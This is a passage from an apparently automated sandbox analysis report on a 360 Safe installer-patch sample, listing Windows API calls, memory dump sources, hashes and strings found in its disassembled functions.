                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca163ee8773178580c16955a931fc0360b074a102bcbe9f4e4e0d875a9d37814
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8401DE33020209BBDF11AFA8CC00F9B3BA8EF55720F218565FA65C2160E736D921DB71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 6BEE79DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetFileValidData), ref: 6BEE79ED
                                                                                                                                                                                                              • SetFileValidData.KERNEL32(000000FF,?,?), ref: 6BEE7A00
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE7A06
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6BEE7A0F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressDataErrorFileFreeLastLoadProcValid
                                                                                                                                                                                                              • String ID: Kernel32.dll$SetFileValidData
                                                                                                                                                                                                              • API String ID: 687652507-1252668126
                                                                                                                                                                                                              • Opcode ID: 8a82d0e48a2918e989d09cc541f099b6ecbd97ee36082cd292821e8d3111409a
                                                                                                                                                                                                              • Instruction ID: 098c5f339dc67352d7c9b1beb28a40113e5cb97256faa9856715316a36d8291e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a82d0e48a2918e989d09cc541f099b6ecbd97ee36082cd292821e8d3111409a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0C237100415EF9B526EA8CC048993B61EA812A8B348DA1F82CD3221D235C663C6B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B663B9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00B663D8
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B663F9
                                                                                                                                                                                                              • GetWindowTextW.USER32(?,00000000,000003FF), ref: 00B6640D
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00B66434
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B66449
                                                                                                                                                                                                              • GetFocus.USER32 ref: 00B66488
                                                                                                                                                                                                              • SetFocus.USER32(?), ref: 00B664A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FocusWindow$H_prolog3ItemMessageSendTextVisible_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1096848440-0
                                                                                                                                                                                                              • Opcode ID: 7cb2dc3c61cebf094ae3c02bb450965d37f413399f277c8e71abf6d04de435f5
                                                                                                                                                                                                              • Instruction ID: 8d2611fa2655b0e380b7a02c50b29ad472c3316cf3b88718762c1716072ea114
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cb2dc3c61cebf094ae3c02bb450965d37f413399f277c8e71abf6d04de435f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41517C71900209AFDB20EBA4DC46BFEB7F4FF24704F104569E516A7291EF34AA48CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 6BF3ABF7
                                                                                                                                                                                                                • Part of subcall function 6BF3EF97: TlsGetValue.KERNEL32(?,6BF3F123,?,6BF3E348,00000042,0000083F,00000002,00000000), ref: 6BF3EFA0
                                                                                                                                                                                                                • Part of subcall function 6BF3EF97: __decode_pointer.LIBCMT ref: 6BF3EFB2
                                                                                                                                                                                                                • Part of subcall function 6BF3EF97: TlsSetValue.KERNEL32(00000000,6BF3E348,00000042,0000083F,00000002,00000000), ref: 6BF3EFC1
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 6BF3AC02
                                                                                                                                                                                                                • Part of subcall function 6BF3EF77: TlsGetValue.KERNEL32(?,?,6BF3AC07,00000000), ref: 6BF3EF85
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 6BF3AC15
                                                                                                                                                                                                                • Part of subcall function 6BF3EFCB: __decode_pointer.LIBCMT ref: 6BF3EFDC
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 6BF3AC1E
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 6BF3AC25
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF3AC2B
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 6BF3AC4B
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6BF3AC5E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1925773019-0
                                                                                                                                                                                                              • Opcode ID: 40ec949d25fb8d6f77e79c43998d645628c83bd8833170629d6f239666e5da4d
                                                                                                                                                                                                              • Instruction ID: a9a8aeafb5be3c3fc591e59bffaa8458cd240c958b3f1929e812f2266a834d7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40ec949d25fb8d6f77e79c43998d645628c83bd8833170629d6f239666e5da4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B014B37420222AFCF08AF72C549A4E3BE9AF4539871584A5E945C7271DB3EC846CAF1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B146A1
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 00B146B3
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00B146E3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 00B146F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastSize_malloc_memset
                                                                                                                                                                                                              • String ID: INIT$PE
                                                                                                                                                                                                              • API String ID: 942205088-3949469810
                                                                                                                                                                                                              • Opcode ID: d7e91bc7e1da3f7450970e91e881f8f3922a7eb3493156fd48e91402c9265c53
                                                                                                                                                                                                              • Instruction ID: 3ec76ecfc6c61f84479a29324597927788b294fd2094adc1005760ffc1f5ba23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e91bc7e1da3f7450970e91e881f8f3922a7eb3493156fd48e91402c9265c53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE1D0B1A083419BDB20DF24D841BAB77E4FF95704F8449ADF9989B381E770D984C792
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF05D5B
                                                                                                                                                                                                                • Part of subcall function 6BF26BE8: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,6BF05BD5,customproxytype,?,AA5945B3), ref: 6BF26C13
                                                                                                                                                                                                                • Part of subcall function 6BF26CC7: RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,6BF05B99,proxytype,00000001,proxytype,?,AA5945B3), ref: 6BF26CEB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CountQueryTick
                                                                                                                                                                                                              • String ID: customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                                                              • API String ID: 3766178726-1816664922
                                                                                                                                                                                                              • Opcode ID: 706c04d091765467f2b2c23c35a14ea14f08f7078e6257773236ce710ead4d6a
                                                                                                                                                                                                              • Instruction ID: ee64905d46bfb553f8aa679ad25f4d5e9c9c8f492a410d5017f5e84acdac6708
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 706c04d091765467f2b2c23c35a14ea14f08f7078e6257773236ce710ead4d6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9971B773904649AFDB24CF64C8919DEB3F8FF04314F50852AE616D62B0EB78A644CF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B48CA6
                                                                                                                                                                                                                • Part of subcall function 00B572A6: __EH_prolog3.LIBCMT ref: 00B572C5
                                                                                                                                                                                                                • Part of subcall function 00B572A6: _memset.LIBCMT ref: 00B572EC
                                                                                                                                                                                                                • Part of subcall function 00B573D5: __EH_prolog3.LIBCMT ref: 00B573F4
                                                                                                                                                                                                                • Part of subcall function 00B573D5: _memset.LIBCMT ref: 00B57422
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00003001), ref: 00B48E38
                                                                                                                                                                                                                • Part of subcall function 00B2AFB8: __EH_prolog3.LIBCMT ref: 00B2AFBF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$_memset$ExchangeInterlocked
                                                                                                                                                                                                              • String ID: .dir$360Installer$\Setup.ini$\custom_wnd.ini
                                                                                                                                                                                                              • API String ID: 3606139519-1812597268
                                                                                                                                                                                                              • Opcode ID: 9ee57938275ea3fd7e654f3a843f89af7be894d12132eb973d743433cff2df91
                                                                                                                                                                                                              • Instruction ID: accdb56b60a6b6222bc59d527d20ff32ff92c27d93bb57628657b030895beab2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ee57938275ea3fd7e654f3a843f89af7be894d12132eb973d743433cff2df91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47518C71900249ABCB04EBE4D896EFEB7F8AF15300F1405A9F126A72D2DF745A48DB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.%3d] Connecting to %s:%d, xrefs: 6BF17BDA
                                                                                                                                                                                                              • [%d.%3d] %s(%s) Connecting to %s:%d, xrefs: 6BF17B2B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3
                                                                                                                                                                                                              • String ID: [%d.%3d] %s(%s) Connecting to %s:%d$[%d.%3d] Connecting to %s:%d
                                                                                                                                                                                                              • API String ID: 49165580-3150661452
                                                                                                                                                                                                              • Opcode ID: 5db5036f2b47b2ad1c9616e390f94c1a965d08b054cc27b229220d00e94ee7fd
                                                                                                                                                                                                              • Instruction ID: cdb79e9543d65b7b2fdc19e97bd8c1e4b581197a1e1141fd70bb243783566c36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5db5036f2b47b2ad1c9616e390f94c1a965d08b054cc27b229220d00e94ee7fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E151CFB2204601DFD714CFB4C985BAAB7E9FF44704F14885DE45A8B2B0EB78E980CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF5307C
                                                                                                                                                                                                              • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 6BF530A5
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF53152
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 6BF5317A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Valuelstrcmpi
                                                                                                                                                                                                              • String ID: Software\360Safe\Liveup$mid
                                                                                                                                                                                                              • API String ID: 999496690-2395435937
                                                                                                                                                                                                              • Opcode ID: ea35972ed17e5cf134bf2ffe6ea7a0a253abfb85cdf437dad52cd97dde84df6c
                                                                                                                                                                                                              • Instruction ID: bb3a2ad7afd50df2f971487ce19895dcb5610fc2693a22f69b35152a78eb3ca7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea35972ed17e5cf134bf2ffe6ea7a0a253abfb85cdf437dad52cd97dde84df6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5841D4739083898BE335CB38C851BFB77E8AFA5708F04499DD58A87150E7399519CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000276D,?,?,?,?,?,?,?), ref: 6BF30772
                                                                                                                                                                                                              • socket.WS2_32(00000002,?,00000000), ref: 6BF307B5
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?), ref: 6BF307C0
                                                                                                                                                                                                                • Part of subcall function 6BF304A4: WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 6BF304C4
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,00000010,?,00000000,?,?,?,?,?,?,?), ref: 6BF307E4
                                                                                                                                                                                                              • WSAAsyncSelect.WS2_32(?,00000000,?,0000003F), ref: 6BF30811
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF3082C
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 6BF30838
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$AsyncSelect$htonlhtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3031483187-0
                                                                                                                                                                                                              • Opcode ID: 0500960952f9bc04e8f84c1184957ba49db5efa24788b4058726a94e638f31ad
                                                                                                                                                                                                              • Instruction ID: 23c716a1b272c044a484a7d7fe124960b9e68a335df196d627da9adfbdb8f372
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0500960952f9bc04e8f84c1184957ba49db5efa24788b4058726a94e638f31ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31DE33610715ABDB109F78C849BAE77B9AF49B60B10096BE956D62B0D7B8C9008BD0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterH_prolog3Leave
                                                                                                                                                                                                              • String ID: MSCF
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,00000000), ref: 6BEE82A2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] DiskFile set file valid data failed file:%s %d, xrefs: 6BEE833A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileSize
                                                                                                                                                                                                              • String ID: [%d.] DiskFile set file valid data failed file:%s %d
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEFB199
                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,00000000,000007FE,?), ref: 6BEFB1D8
                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(000007FE,00000000,00000000,?,?,?,?,?,?,?,00000000,000007FE,?), ref: 6BEFB1F3
                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,6BF6419C,?,?,000007FE,00000000,00000000,?,?,?,?,?,?,?,00000000,000007FE), ref: 6BEFB216
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue_memset
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d$%s\%s
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(00000005,?), ref: 00B64AAC
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000104,000000AF,00000050,00000001,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000), ref: 00B64AE4
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,000000CE,000000AF,00000050,00000001,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000), ref: 00B64B04
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B17
                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B2E
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B3B
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B47
                                                                                                                                                                                                                • Part of subcall function 00B558F3: __EH_prolog3.LIBCMT ref: 00B558FA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Show$Move$ClientDestroyH_prolog3Rect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00B9EABD
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00B9EAC9
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B9EAD6
                                                                                                                                                                                                              • __initptd.LIBCMT ref: 00B9EADF
                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,00B9EA09,00000000,?,?), ref: 00B9EB0D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B9EB17
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00B9EB2F
                                                                                                                                                                                                                • Part of subcall function 00B998D1: __getptd_noexit.LIBCMT ref: 00B998D1
                                                                                                                                                                                                                • Part of subcall function 00B9A5B1: __decode_pointer.LIBCMT ref: 00B9A5BC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000D,?,6CD34437,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?), ref: 6CDDC58E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?,00000001,?,?), ref: 6CDDC595
                                                                                                                                                                                                                • Part of subcall function 6CDDC4A6: IsProcessorFeaturePresent.KERNEL32(0000000C,6CDDC57C,?,6CD34437,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?), ref: 6CDDC4A8
                                                                                                                                                                                                              • RtlInterlockedPopEntrySList.NTDLL(01637D30), ref: 6CDDC5A2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?), ref: 6CDDC5B7
                                                                                                                                                                                                              • RtlInterlockedPopEntrySList.NTDLL(00000000), ref: 6CDDC5D0
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?,00000001), ref: 6CDDC5E4
                                                                                                                                                                                                              • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 6CDDC5FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2304957937-0
                                                                                                                                                                                                              • Opcode ID: dba07d1116cd93d6fba853acf6bcd436f43d8126583f44a5245e3d0300bea241
                                                                                                                                                                                                              • Instruction ID: 1901b78941cc0c85674f61f9c753f9ccbc701ec0d52496b0ecbf81e6c4428d1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dba07d1116cd93d6fba853acf6bcd436f43d8126583f44a5245e3d0300bea241
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A001F932B56210E7EF3167799C08F4A3B79ABC6B15F924024F410E75A0CF32E8008BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD51C52
                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000,00000018), ref: 6CD51C74
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CD51CBE
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000400,00000000), ref: 6CD51CCF
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6CD51D0A
                                                                                                                                                                                                              • SetWindowsHookExW.USER32(00000003,6CD3D3E5,00000000,00000000), ref: 6CD51D19
                                                                                                                                                                                                                • Part of subcall function 6CD4537A: __EH_prolog3_catch.LIBCMT ref: 6CD45381
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$DirectoryGdiplusH_prolog3H_prolog3_catchHookStartupThreadWindows_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3120476819-0
                                                                                                                                                                                                              • Opcode ID: f129faa49bb95a31256f8241988a55f8ebd7381f8e0b4e33a6829968df39c72b
                                                                                                                                                                                                              • Instruction ID: bf697ba72136b01a7bd6c2420ebde8ec836e133f0e86e1188202f8fceccd61d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f129faa49bb95a31256f8241988a55f8ebd7381f8e0b4e33a6829968df39c72b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C312CB1A002099FDF44DFA4C985AEDB7F8FF09308F90452EE545D7690DB35AA19CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 6BF3ACA5
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 6BF3ACB1
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6BF3ACBE
                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,6BF3ABF1,00000000,?,?), ref: 6BF3ACF5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 6BF3ACFF
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6BF3AD17
                                                                                                                                                                                                                • Part of subcall function 6BF3DC8C: __getptd_noexit.LIBCMT ref: 6BF3DC8C
                                                                                                                                                                                                                • Part of subcall function 6BF38356: __decode_pointer.LIBCMT ref: 6BF38361
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1803633139-0
                                                                                                                                                                                                              • Opcode ID: 3fab13a0797fe12cc80585d2f2020f5dd915aa1bdd6a75a24fa024610ac5a3bc
                                                                                                                                                                                                              • Instruction ID: 3ef6e99f5c6800679647049c14a5901898593fdd221edca140aeaa2e2c7e850c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fab13a0797fe12cc80585d2f2020f5dd915aa1bdd6a75a24fa024610ac5a3bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511CE7351422AAFDF00AFB9DD8289E7BF4EF44368B204469F510D2170EB79D9018BE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF0ADFF: __EH_prolog3_GS.LIBCMT ref: 6BF0AE06
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0B2F3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0B328
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] SetFileLen %I64d , xrefs: 6BF0B3DE
                                                                                                                                                                                                              • [%d.%3d] AllocRange fail , xrefs: 6BF0B455
                                                                                                                                                                                                              • [%d.%3d] AsyncStartHttp fail ErrorCode = %d(%s), xrefs: 6BF0B495
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3_
